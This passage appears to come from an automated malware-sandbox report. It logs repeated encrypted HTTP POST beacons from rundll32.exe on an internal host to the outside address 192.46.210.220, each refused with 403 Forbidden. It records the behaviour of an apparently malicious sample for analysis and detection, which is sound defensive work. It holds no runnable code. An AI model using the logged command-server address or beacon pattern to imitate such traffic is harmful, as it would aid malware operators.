2021-10-28 02:45:52 UTC | 114 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:53 UTC | 124 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:53 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 24
Source IP: 192.168.2.5
Source Port: 49851
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:53 UTC | 119 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:53 UTC | 119 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:53 UTC | 124 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:53 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 25
Source IP: 192.168.2.5
Source Port: 49857
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:56 UTC | 124 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:56 UTC | 124 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:56 UTC | 133 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:56 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 26
Source IP: 192.168.2.5
Source Port: 49859
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:56 UTC | 129 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:56 UTC | 129 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:57 UTC | 134 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:57 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 27
Source IP: 192.168.2.5
Source Port: 49865
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:00 UTC | 134 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:46:00 UTC | 134 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:46:00 UTC | 143 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:46:00 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 28
Source IP: 192.168.2.5
Source Port: 49872
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:00 UTC | 139 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:46:00 UTC | 139 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:46:01 UTC | 144 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:46:01 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 29
Source IP: 192.168.2.5
Source Port: 49878
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:03 UTC | 144 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:46:03 UTC | 144 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:46:04 UTC | 153 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:46:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 3
Source IP: 192.168.2.5
Source Port: 49768
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:11 UTC | 14 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:11 UTC | 15 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:12 UTC | 24 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:12 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 30
Source IP: 192.168.2.5
Source Port: 49880
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:04 UTC | 149 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:46:04 UTC | 149 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:46:05 UTC | 153 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:46:05 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 31
Source IP: 192.168.2.5
Source Port: 49887
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:07 UTC | 154 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:46:07 UTC | 154 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:46:08 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:46:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 32
Source IP: 192.168.2.5
Source Port: 49889
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:08 UTC | 158 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:46:08 UTC | 159 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:46:09 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:46:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 33
Source IP: 192.168.2.5
Source Port: 49896
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:12 UTC | 164 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:46:12 UTC | 164 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:46:13 UTC | 173 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:46:13 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 34
Source IP: 192.168.2.5    Source Port: 49897    Destination IP: 192.46.210.220    Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:12 UTC | 168 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:46:13 UTC | 173 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:46:13 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 35
Source IP: 192.168.2.5    Source Port: 49905    Destination IP: 192.46.210.220    Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:16 UTC | 174 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:46:17 UTC | 183 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:46:16 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 36
Source IP: 192.168.2.5    Source Port: 49904    Destination IP: 192.46.210.220    Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:16 UTC | 178 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:46:17 UTC | 183 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:46:16 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 37
Source IP: 192.168.2.5    Source Port: 49912    Destination IP: 192.46.210.220    Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:20 UTC | 183 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:46:20 UTC | 193 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:46:20 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 38
Source IP: 192.168.2.5    Source Port: 49913    Destination IP: 192.46.210.220    Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:20 UTC | 188 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:46:20 UTC | 193 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:46:20 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 39
Source IP: 192.168.2.5    Source Port: 49920    Destination IP: 192.46.210.220    Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:24 UTC | 193 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:46:24 UTC | 203 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:46:24 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 4
Source IP: 192.168.2.5    Source Port: 49769    Destination IP: 192.46.210.220    Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:11 UTC | 19 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:45:12 UTC | 24 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:45:12 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 40
Source IP: 192.168.2.5    Source Port: 49921    Destination IP: 192.46.210.220    Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:24 UTC | 198 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:46:25 UTC | 203 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:46:24 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 41
Source IP: 192.168.2.5    Source Port: 49940    Destination IP: 192.46.210.220    Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:28 UTC | 203 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
